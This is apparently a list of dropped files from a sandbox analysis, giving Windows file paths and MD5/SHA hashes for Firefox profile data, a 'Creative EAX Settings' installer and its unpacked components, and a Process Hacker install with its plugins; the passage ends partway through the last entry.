MD5 97ca994d674620aa48eee07539ccf4b3
SHA1 73054b9b9b8b89abb2e4ac19916eb962bca0831c
SHA256 59a8f8ed5fe83cb612f59987082ac374a78f58ee11914a674ea93d3b2f2e34d7
SHA512 f62e4d5b106d2eec1a56341a2dcd85c94a5c64b28290befa882dba61329895d0b9644d8d89d6f9ebacd19fa2d3bf3ae008907502224b2696cdd3aecb6f4f0aa0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 fb2214180f7e845b89cba6ea3432a264
SHA1 2ed4dc2b0a5259b577e1110865e7559f99c74809
SHA256 5e38326694072d24a675a90002a8f8be8d554cc5bf4607368adb81b6adf0891b
SHA512 0ec34412b63dff10aa3fc72de0a197a04572aa31a9c569741f77528cbbb320376b05d7152d003bb6d53fdd3e9f22938eed9a619995dbfa2d8a51907a907cf896

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\prefs-1.js

MD5 9c92cbba6f5d8d220c5ac67bea75e325
SHA1 b9cef7ad3d3e3393ea114dc7eb87e86e5349f919
SHA256 d74c9be2091238ed442c18e52592b619fa864196ea0cc886cd24d073a0b48adb
SHA512 cd774cc9345da7f86f7b4bfab5f36242d3b3becbe2e9661e00fafc2120f671c0920a9ebfb4d46872ec7328c46a7f55e366ab886f1484eb3bec1d2f64b6bb6091

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x3x6afp6.default-release\cache2\entries\7002E71F4F8431A3D59D2158243A0EA278856918

MD5 3937426574308d4cbe30a80ba5d929e0
SHA1 1d7132260d397f71717dee80fa0c921d77e23fad
SHA256 f9f167c49e49c8126a1f349b03b3595bfff021e7aed2c25ad7418f098131adf3
SHA512 21b6cf03d516a6d182ee24ebe248e513928b9339ad435ffe3b392aed86448a27cff387f9d4d30ef4d5e72bbfc3eff8c9699540a525e7396c6d0cb1d6f0ac368b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\prefs-1.js

MD5 7b545e28dad1398a3ee2a9fa7f35e36b
SHA1 8c9f4d69123caaba64f765201d97a05db928271d
SHA256 fa47df66a060130d3d1d5568f66f56b828fceeb7945ee39fc99f1ce8a040bba5
SHA512 3a45b238f96d4a726eba653e66ed1e253ff9d75c8e97f84fdc460f78b20c871d9a76779225f49b73ebf6b77e61c709d3d57cd9a7c76d0f2dad2602cfaa0979f9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 f2597415850d3de7a9c32b528e456e68
SHA1 c711651b914f19b2ffa0bc7c1655fd56878347ce
SHA256 75d924faebe5dbb1ca1ac5de62d51f038aa02702809e6b184d9ce4979364e7ed
SHA512 883548d63ea0ae45f2fa9a1baf850cdbe297d129da15d7cb2b656bfdffcd1e8208eec63045d79f3eb0bbc318afd141a427c66412b40481c7985f28bcb0f855e9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x3x6afp6.default-release\cache2\doomed\23428

MD5 976724cd094375af199b6a7ffb4c195c
SHA1 36bad40fd3e841093d2ce6271d52832ed6b90c9c
SHA256 f43059ab7789ae59d187f730da212867dcf81578393ad319610145baff2ae10e
SHA512 eb4cda9f93da170ea9b345b32dd319d598eecd2aa2a83325e23a31207c92174e20ea85421fe31593b0ab29d727f6eb6c6b28a177c64783986ec65ce2e3a87af1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x3x6afp6.default-release\cache2\entries\D89BBF9AC28AE20EFEB236DD0A82EBB260FE272B

MD5 c6dbd42c9731b779fabedba8306f85cb
SHA1 56d8e6e20f9cfc39c3f7343f2af89669344af7c0
SHA256 89deba8e54db01d7ffa1360585a50ba2e01782c8a4703b0f5bb98c7bdabce9ae
SHA512 1637fe7026ea6bc60087d039558b17e9aa194cf4267ec82f6c7d0bbc0946a3d2b622719f5ad6ea8d2893ec10358cab6f7e85f4e076e62931d5961670cdb9f64b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 68e08c871075d118819dbf908200ae70
SHA1 0c2422e4676e8814a6b8aa15fd4cde8b1ff4ea79
SHA256 77b63e0a6573b587f3ce85ba95d241e2108ddcd6d480ed4ff7259d7aea12553b
SHA512 5f74ab6803ec5ec698c30058f542af35d9ccfe8c979dc498b657b6405b897a37d7a744449f7ddd3037a19d5eab3c793574c57b379673694a788bbd8de1b6bbb6

C:\Users\Admin\Downloads\Creative EAX Settings.iHTeX2Zz.exe.part

MD5 233ede8d729d7e3274459b59eee7294c
SHA1 708244dcc45c09b6a1e6675ccb1e99fc83e56974
SHA256 a4f069de42d1c4c15d8ce7d59af3d3f36c5c0eb9b513da47c8ad3510ccb1b768
SHA512 01e87b721da296364cf9821569e2a1a79e464458b00b042040a8f13094334d528cda933de08c65b8fce8269e67750ce565959024d65c9404048ba929c3e49d64

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 c882b0832b9b67d26fd20f84bfa00e04
SHA1 c00049d6a40a190fbb2c80d768c848d0ffb0b081
SHA256 1020a43a748ee68c860bb3b5790a58319db8e5ed0ae94b67513295ae77f2e399
SHA512 e08f23edf7618579fe331e8398f40fba6ecd7dd824de61764dcc045e18b2bd7ca0bf5466d85789c3fb783ac8b1190f24bf1287173f97929eb80f893a1af6b88a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a880a6009b74d34a671bd16887f9f6ed
SHA1 61e68d434a8602e33fda5c46a1ca01f432779b05
SHA256 4394a76da738621e0ab568357a3b9a06e9e72c708879bc1829b700039b49c080
SHA512 ac9f000eb79b23c590881bbb95ae618dc8aa92245a7718e30ea223c8b49d4edb0616bd984785e54c0c284574ac9c98cb56c2c1d8ead3a651eaf48f49659dace3

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x3x6afp6.default-release\cache2\entries\214FDE694F88FCB40A851D8D516B8C71B5F15F57

MD5 91d2723d0515a8f51e0141639540dc0c
SHA1 86f858bdcc5437ded6ed1e90d15a90d30699507a
SHA256 ee49e699b4c769d71805b20c45035893dba79074d426d68a26cce756c2fed4bb
SHA512 0dbe0788d3289dddfaf681b36b62c31a093c47a81564b8d1d8b07280c0b4362cd2e4efcc5fc411114b7f0d3497f4f99df6f2e95b37d3a2f642304cdf76ec41c2

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x3x6afp6.default-release\cache2\entries\39ED4EBD222CF7B53B02F2F899F297DFDE343F51

MD5 3563596458a3909a87ff3311cd451ac7
SHA1 9252073860a967025c9f96cfbb3d667c5bb11dc0
SHA256 f80496197d336ae2b075fb81573e71b60abfd3f4000a67ae30eb4f7ddd62ee74
SHA512 e6c55e664ead7b3b571049316a2f6938bae52f8405c6509906598feeb2ba926059f92d4f6dec8891f480981839b73c3992ec5b49667bd6378431753428f6e37c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 c1b48292ccb206a03e1546af82a3ac87
SHA1 86d59b4004e17068f5d922de062f52ccda6d5301
SHA256 1434ec96017a6d52c84560bba7579942f87454ab790b609ab13411e962b8d43a
SHA512 2392b002da19322240b702f857c1ed20ee067a4f34d78e0ce9c6a3d79b45e343e1854ead86cbb6d73f90d534cb8f7ee33c3ee49c162a2e9d4ec7d3de57fdb612

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x3x6afp6.default-release\cache2\entries\70D4B933DB0A168E9C9E8BF4AC9C05B6553086A5

MD5 ca71f817a491e0cddf250a4acf17c9f6
SHA1 568d87d3ff662f44c1543d1ccb0a728b9c60e3a5
SHA256 1eba1ecaa25b41162cc93cbf5936d8c6bf0f0e99afb8952678ff95252053147c
SHA512 4a09ee612968c55374915eb01bd6af4e37bdaf3d1fd50b43148cbc35711487c57f3b57dc36675a1549d7a23aa92b3d986a9934c651607d2d26334333de611c5e

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x3x6afp6.default-release\cache2\doomed\24938

MD5 dd8edc45fc544c8a50dc64a082afab36
SHA1 53300ca6e3eb78daa20c5da2697942b0976dff20
SHA256 778e938dc71af5d32631a5285f0bee2864de1e70c1846ee11c7ab1f74fa5eeff
SHA512 30e05dbadfe8aafd6f83e38a05352c5b909e49cc57672f9ca657f1cfb2bd97cdc6731f52421906fbf581eabc056f4527f9aa99b01d6de58ae6489562c3a63fd0

C:\Users\Admin\Downloads\processhacker-2.z5IALygd.39-setup.exe.part

MD5 16c9178b81ccda72caadb9861893a824
SHA1 0e5766969790e5b479fbf9eb6ae471cb1425e07e
SHA256 e1b0669f8e94fa692b49a1e4970f391cb549283f4a79e0ffd28ee26c7cdbf91a
SHA512 d9b562b29f53e65a437dc04b45c3fe5f005af1138c951b8fc27c0c1cc67a55ee032189190fe02e67ee840d59311da024928c127ecf93fea4aeb0e32705c7dcf8

C:\Users\Admin\Downloads\processhacker-2.39-setup.exe

MD5 54daad58cce5003bee58b28a4f465f49
SHA1 162b08b0b11827cc024e6b2eed5887ec86339baa
SHA256 28042dd4a92a0033b8f1d419b9e989c5b8e32d1d2d881f5c8251d58ce35b9063
SHA512 8330de722c8800ff64c6b9ea16a4ff7416915cd883e128650c47e5cb446dd3aaa2a9ba5c4ecda781d243be7fb437b054bbcf942ea714479e6cc3cef932390829

memory/3484-2748-0x0000000000400000-0x000000000042B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp

MD5 1c96ed29e0136825e06f037bf10b2419
SHA1 b74a55279474253639bebf9c92f10f947145ff30
SHA256 b10cf8cdf541ca0dd6df79e66fb4b0854dcac717aba034ba0c4961bff92fd021
SHA512 0e74854d9de4e3944b2cff9b5de7eb19fdec1fee6c9576cae6cd81741adf84eac421cb743b1df30183f645ffe849357b6a85b5be8d7f6e2efe289bbe4573e177

memory/1940-2754-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3484-2808-0x0000000000400000-0x000000000042B000-memory.dmp

memory/1940-2809-0x0000000000400000-0x00000000004D4000-memory.dmp

C:\Program Files\Process Hacker 2\ProcessHacker.exe

MD5 b365af317ae730a67c936f21432b9c71
SHA1 a0bdfac3ce1880b32ff9b696458327ce352e3b1d
SHA256 bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4
SHA512 cc3359e16c6fe905a9e176a87acf4c4ed5e22c29bfca11949799caf8442e00ec0d1679b3d8754dbc3e313528d3e8e82c0ec1941e2c3530b48229c1cb337f6b8b

C:\Program Files\Process Hacker 2\ProcessHacker.exe

MD5 653ba46a9773d56f032cb664a6b03f89
SHA1 53236315fc968748d794c05112516a1676dc9104
SHA256 9aa56cfb679d561a0f4dab714b61f1e31c0a69acde991504b227d3690aeda0c4
SHA512 23c4e8e39b5edac5eacb17d6231627bc3098f9c019b2130d358da65e7f3bc97109ba8f73141bdb4141b48f4425f1fda1f370accc4fb0622bbbfa6131d6809d1a

C:\Program Files\Process Hacker 2\ProcessHacker.exe

MD5 ead233ab80549059477e1ffc430493df
SHA1 14731f3899c7c88035e0b78489afbf45bc8dbafc
SHA256 02726435fda5d472dd59e9ee02317b5e78e6d28e337a9dcd6e56b4c4a372e854
SHA512 8868c3c4330e39868a8dea356547ccb3474de5f5122c5c9dcf8d1548f237fdf368165dfd341128b5c64d27c10aca3487f09282134737437c782d4b446cf07b07

C:\Program Files\Process Hacker 2\plugins\ExtendedNotifications.dll

MD5 be4dc4d2d1d05001ab0bb2bb8659bfad
SHA1 c0ed9e375b447b61c07c0b00c93bb81c87bcfc2e
SHA256 61e8cd8de80a5c0d7ced280fe04ad8387a846a7bf2ee51bcbba96b971c7c1795
SHA512 31389e268fe3bf1175fa3c251ca026f77dc59361b8425c9826f31d18c5174e6de68c6092aef187f2bd2c92d89b3093a660b2fe6189af369293c1117c856b5cdf

C:\Program Files\Process Hacker 2\plugins\ExtendedServices.dll

MD5 eb6afec557f0b1f99e100ab59e90d1da
SHA1 b50be7a933b46b398e7dd4d63018edd04da1b73c
SHA256 ea35170a46c48331c7ff21ff369b1a4b0bc4ec6eb7f03b7da809726d3a2e5cb8
SHA512 0e4a3862d0a3f0867b7e9d66faff0af9faa2ef539a878943dbb6efd2f7d10d3fdacf2f6fb7ba35b206f45ff0814e5e685f9548da3998f3f5ef6d4343c8aa1ec3

C:\Program Files\Process Hacker 2\plugins\OnlineChecks.dll

MD5 733d4c608d11d42acd711fba0a279140
SHA1 034787f55ca3fb4f1c2c4b30fd9434f5377913e5
SHA256 dcdd4e204aa0352b8385dd34cc3ce400d235949e1b1ad5d6e0a45e730f1443f4
SHA512 6bd12f89b337603b6d93c6221240eaea6c5d5b26bc95fb1854e308e737a08693ff6cca5def24b7d58f0d329fe5a75f14cc871abac490bff0d1cd8dab1e896838

C:\Program Files\Process Hacker 2\plugins\SbieSupport.dll

MD5 6eee2543708fbef69acf05290dba89b7
SHA1 22317e62cc3c1353c3716e0acf6e467afa42a93e
SHA256 5800241c3b3b9baf4c3662018ad2c220abf354f84b4a50ec37c58345c57d895a
SHA512 9a97ffb840fbff8be25592b5dfcef85d6da73806a5e7ac25e9d9d1b0d39984d2854517414818c7fa400b5f53d5ede04a26949c7d66aac9df82d0ee63d35eedd7

C:\Program Files\Process Hacker 2\plugins\WindowExplorer.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Program Files\Process Hacker 2\plugins\WindowExplorer.dll

MD5 0e8d04159c075f0048b89270d22d2dbb
SHA1 d0fa2367d329909b6c9efcb3cc2c2902d8cf9b22
SHA256 282696487ea5dc781788d5d8477b977f72b7c70f201c2af0cfe7e1a9fd8d749a
SHA512 56440f3feddc124574debfe3789e14d908982d4d8e9516f42fab7db7bcecdd3badd2f75e005016a7b9d87a00d5646b8df722bae8fba3932198babbe5335cf197

C:\Program Files\Process Hacker 2\plugins\UserNotes.dll

MD5 e48c789c425f966f5e5ee3187934174f
SHA1 96f85a86a56cbf55ebd547039eb1f8b0db9d9d8d
SHA256 fc9d0d0482c63ab7f238bc157c3c0fed97951ccf2d2e45be45c06c426c72cb52
SHA512 efdb42e4a1993ee6aa5c0c525bd58316d6c92fbc5cebbc3a66a26e2cf0c69fe68d19bc9313656ad1d38c4aef33131924684e226f88ef920e0e2cd607054a857c

C:\Program Files\Process Hacker 2\plugins\Updater.dll

MD5 6976b57c6391f54dbd2828a45ca81100
SHA1 a8c312a56ede6f4852c34c316c01080762aa5498
SHA256 0c11cdc3765ffb53ba9707b6f99ec17ae4f7334578a935ba7bcbbc9c7bdeed2e
SHA512 54d8b39457f516d921bb907615ff60a46b6031e1444a443c9657e06d78c9fb0f637ae4756bb7b884e4dca2f55902372ad4ddba1d020abe02e0a381702ae270cc

memory/1940-2893-0x0000000000400000-0x00000000004D4000-memory.dmp

memory/3484-2894-0x0000000000400000-0x000000000042B000-memory.dmp

C:\Program Files\Process Hacker 2\plugins\ToolStatus.dll

MD5 3788efff135f8b17a179d02334d505e6
SHA1 d6c965ba09b626d7d157372756ea1ec52a43f6b7
SHA256 5713d40dec146dbc819230daefe1b886fa6d6f6dbd619301bb8899562195cbab
SHA512 215d6c3665323901d41ae5151908c4e084a04a1558617016f0788194304e066410b92943bd6c119339727037ee02cfda893b9baf5603b2870d9fc5ae0c77ca7e

C:\Program Files\Process Hacker 2\plugins\SbieSupport.dll

MD5 37cbfa73883e7e361d3fa67c16d0f003
SHA1 ffa24756cdc37dfd24dc97ba7a42d0399e59960a
SHA256 57c56f7b312dc1f759e6ad039aac3f36ce5130d259eb9faad77239083398308b
SHA512 6e0bfab9ff44f580f302cabd06fc537a9e24432effd94b50ab696b35f57a61772072b7f9045a9e99fa4bf3bc316f43ea25ab6c87517242e7957eb86575203bed

C:\Program Files\Process Hacker 2\plugins\OnlineChecks.dll

MD5 12c25fb356e51c3fd81d2d422a66be89
SHA1 7cc763f8dc889a4ec463aaba38f6e6f65dbdbb8c
SHA256 7336d66588bbcfea63351a2eb7c8d83bbd49b5d959ba56a94b1fe2e905a5b5de
SHA512 927d785d03c1ee44b5e784b35a09168978b652f37fb73a1a2eeecd3583c28595fb030e8c1f87ab9a20beac4622775777820d1a2ad7219ba8b9ae8b6fbc4568a0

C:\Program Files\Process Hacker 2\plugins\NetworkTools.dll

MD5 d6bed1d6fdbed480e32fdd2dd4c13352
SHA1 544567d030a19e779629eed65d2334827dcda141
SHA256 476aa6af14dd0b268786e32543b9a6917a298d4d90e1015dac6fb2b522cf5d2e
SHA512 89362a7b675651f44649f0ea231f039e0b91aba9f84c91545f15e187c6cbd07bbf3648a4e232dfe5122cf5636e67c458f4f7dab49ed4de3f3a303aa396c41d1c

C:\Program Files\Process Hacker 2\plugins\HardwareDevices.dll

MD5 a46c8bb886e0b9290e5dbc6ca524d61f
SHA1 cfc1b93dc894b27477fc760dfcfb944cb849cb48
SHA256 acd49f2aa36d4efb9c4949e2d3cc2bd7aee384c2ced7aa9e66063da4150fcb00
SHA512 5a4d2e0fa7a1a14bc4c94a0c144bfbfcef1ecabe4dc15f668605d27f37f531934778f53e7377bab0ff83531732dc15e9fc40b16f2d1f7e925429681bd5bdca73

C:\Program Files\Process Hacker 2\plugins\ExtendedTools.dll

MD5 bc61e6fb02fbbfe16fb43cc9f4e949f1
SHA1 307543fcef62c6f8c037e197703446fcb543424a
SHA256 f2805e0f81513641a440f1a21057a664961c22192cb33fca3870362c8f872d87
SHA512 0bbfe53e1dd933a3080d9775ad890fcbd73f9820885efa6b69e9664261249f34eaae3870f74de8511734fc9a0114f36e1bfc529a032d303a8e3e583e37a506c6

C:\Program Files\Process Hacker 2\plugins\ExtendedServices.dll

MD5 4858bdb7731bf0b46b247a1f01f4a282
SHA1 de2f9cbcec1e1fa891d9693fb3cadfdd4cfe1f60
SHA256 5ae7c0972fd4e4c4ae14c0103602ca854377fefcbccd86fa68cfc5a6d1f99f60
SHA512 41b39560e15d620733ca29dc37f55a939a653f99686ac86643ccc67fbb807ad95d1996b867319d98506f3b8a30772fff3c3317bbcc205987f48031923f674d9a

C:\Program Files\Process Hacker 2\plugins\DotNetTools.dll

MD5 b16ce8ba8e7f0ee83ec1d49f2d0af0a7
SHA1 cdf17a7beb537853fae6214d028754ce98e2e860
SHA256 b4cc0280e2caa0335361172cb7d673f745defc78299ded808426ffbc2458e4d9
SHA512 32de59c95d1690f4221b236376e282c8be1bb7f5d567592b935dcd798b36b80e86da81741c5845fa280386f75f6eafc9bbd41035362984150b134d24aede61eb

C:\Program Files\Process Hacker 2\ProcessHacker.sig

MD5 2ccb4420d40893846e1f88a2e82834da
SHA1 ef29efec7e3e0616948f9fe1fd016e43b6c971de
SHA256 519c2c2ca0caf00db5b3eb2b79dfe42e6128161c13aeb4b4d8b86fbffc67e3d4
SHA512 b2a000b33d4a9b2e886208fc78aeb3a986f7bd379fb6910da9f6577603aa6e8237cb552eabca70445f37b427419beeff0b061090cb952331b8db322ce2e58bc6

C:\Users\Admin\Downloads\Creative EAX Settings.exe

MD5 6d435f0215057524cccfe7a52c19e9cf
SHA1 a03a4bc9674ca7b20b8489a10097144c0ea38a6a
SHA256 628d19dfddf4a1b5385112feb088b8277b6dd3baf42dd19eb0dce58dfffb6e6d
SHA512 3ab01b7603381b3cc688f832b0c677383f63a7bd3f1aa10e269ea8f6b24a8d8e73db00de565cdc2d1229cea646fcd13e73388e1af5aceb924f69acb222462c64

C:\Users\Admin\Downloads\Creative EAX Settings.exe

MD5 d6da8ad224d6200dd5662644858b12c7
SHA1 658824c4434292dcd6601a7100c3b68f6b78a973
SHA256 2cf147182fce3b86da3a4e63688b39ac30e47956ce5b01c2ffcc3c4243526b5c
SHA512 91c0aab428b238ad00d3ceb94645de5b94a74eb15ce57d3a5c544f56c65ab5a00b74d6a67fecd04af9a2193f6ab8d3e87f1c3ec24337b5bb86905e0ea7535b83

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\Creative EAX Settings.exe

MD5 d06fd22fe35edc3c98621db0526b1201
SHA1 fcbc31abbd9896304f137936f247830216e6dd86
SHA256 04462440457e102d163b0ed2a84ad5c415257ea5d0564df0d49ac133397d67bd
SHA512 b34626bf1c8471d566c2546218df80ddc992fa6d70278dec814b967e814eab76416aeb8eb3d7501782057c434c72ab96dde723e58aa585593dcf4bc183541480

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\d3dcompiler_47.dll

MD5 7641e39b7da4077084d2afe7c31032e0
SHA1 2256644f69435ff2fee76deb04d918083960d1eb
SHA256 44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47
SHA512 8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\ffmpeg.dll

MD5 c3842fb3087cdcdb04020ac38683c289
SHA1 329dbcd4a1c79b891b200f11eb50194b85c493bc
SHA256 e79792af338d61424bac87a19c6f34f3b4bc1382345633b8d509253a0a6c2133
SHA512 069196b8006e908954e7ab16131a0d10889a0f7517eaab2423a82fe49fb9b045c0d95dbf7c08c10ddf1a21983aea4a0d207decf91baacff0884511589a57dec5

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\icudtl.dat

MD5 674a758eff8704903d2d4996daf039a6
SHA1 52fc915878772ffdeae0697aaaa596155bae761c
SHA256 f40934019017777204739c0349a2a861e66da3717520b03d321a9b509e0c0d92
SHA512 97a558ce3561766212f94feb9e64840d963fafa37f21b13a08a8aae480ee7e43dd51b6275277d660eedda512539d5fb83f5c045f7c87a9bde78f16376241adda

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\libGLESv2.dll

MD5 b6a433dc7b4030fb17bd1683a9606b6e
SHA1 0602c50532e3f13facc67bd95a048c470e88afcc
SHA256 f7ae57a1d7d3e284714ca354f5292aa9b75086489cbfba8b1f54548445b6b3e9
